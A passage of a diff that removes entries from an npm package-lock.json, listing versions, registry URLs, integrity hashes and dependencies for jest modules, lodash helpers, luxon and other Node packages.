"@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-bignum": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/json-bignum/-/json-bignum-0.0.3.tgz", - "integrity": "sha512-2WHyXj3OfHSgNyuzDbSxI1w2jgw5gkWSWhS7Qg4bWXx1nLk3jnbwfUeS0PSba3IzpTUWdHxBieELUzXRjQB2zg==", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.camelcase": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", - "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==", - "license": "MIT" - }, - "node_modules/lodash.chunk": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/lodash.chunk/-/lodash.chunk-4.2.0.tgz", - "integrity": "sha512-ZzydJKfUHJwHa+hF5X66zLFCBrWn5GeF28OHEr4WVWtNDXlQ/IjWKPBiikqKo2ne0+v6JgCgJ0GzJp8k8bHC7w==" - }, - "node_modules/lodash.flatmap": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/lodash.flatmap/-/lodash.flatmap-4.5.0.tgz", - "integrity": "sha512-/OcpcAGWlrZyoHGeHh3cAoa6nGdX6QYtmzNP84Jqol6UEQQ2gIaU3H+0eICcjcKGl0/XF8LWOujNn9lffsnaOg==" - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/luxon": { - "version": "3.6.1", - "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.6.1.tgz", - "integrity": "sha512-tJLxrKJhO2ukZ5z0gyjY1zPh3Rh88Ej9P7jNrZiHMUXHae1yvI2imgOZtL1TO8TW6biMMKfTtAOoEJANgtWBMQ==", - "license": "MIT", - "engines": { - "node": ">=12" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.3", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", - "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", - "license": "MIT" - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": 